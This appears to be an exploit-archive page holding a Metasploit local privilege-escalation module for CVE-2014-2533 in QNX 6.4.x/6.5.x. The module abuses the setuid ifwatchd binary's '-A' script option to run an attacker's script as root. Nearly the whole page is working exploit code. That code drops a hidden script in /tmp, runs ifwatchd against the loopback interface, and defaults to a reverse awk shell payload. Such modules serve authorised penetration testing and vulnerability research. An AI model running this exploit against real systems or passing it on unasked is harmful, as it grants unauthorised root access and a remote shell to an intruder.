ifwatchd Privilege Escalation

This Metasploit module attempts to gain root privileges on QNX 6.4.x and 6.5.x systems by exploiting the ifwatchd suid executable. ifwatchd allows users to specify scripts to execute using the '-A' command line argument; however, it does not drop privileges when executing user-supplied scripts, resulting in execution of arbitrary commands as root. This Metasploit module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).


MD5 | 7a562f56fafb417de6cf725f6b38c71d

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'ifwatchd Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd suid executable.

ifwatchd allows users to specify scripts to execute using the '-A'
command line argument; however, it does not drop privileges when
executing user-supplied scripts, resulting in execution of arbitrary
commands as root.

This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
and 6.5.0 SP1 (x86).
},
'License' => MSF_LICENSE,
'Author' =>
[
'cenobyte', # Discovery and exploit
'Tim Brown', # Independent discovery
'Brendan Coles' # Metasploit
],
'References' =>
[
['CVE', '2014-2533'],
['BID', '66449'],
['EDB', '32153'],
['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
],
'DisclosureDate' => 'Mar 10 2014',
'Platform' => 'unix', # QNX
'Arch' => ARCH_CMD,
'SessionTypes' => %w(shell meterpreter),
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'Payload' =>
{
'BadChars' => '',
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'gawk generic'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 10,
'PAYLOAD' => 'cmd/unix/reverse_awk'
}
))
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end

def ifwatchd_path
'/sbin/ifwatchd'
end

def base_dir
datastore['WritableDir']
end

def check
unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{ifwatchd_path} is setuid"

CheckCode::Detected
end

def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end

if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"

print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}"
cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path

cmd_exec "chmod +x '#{script_path}'"

print_status "Executing #{ifwatchd_path}..."
interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
end
end

Related Posts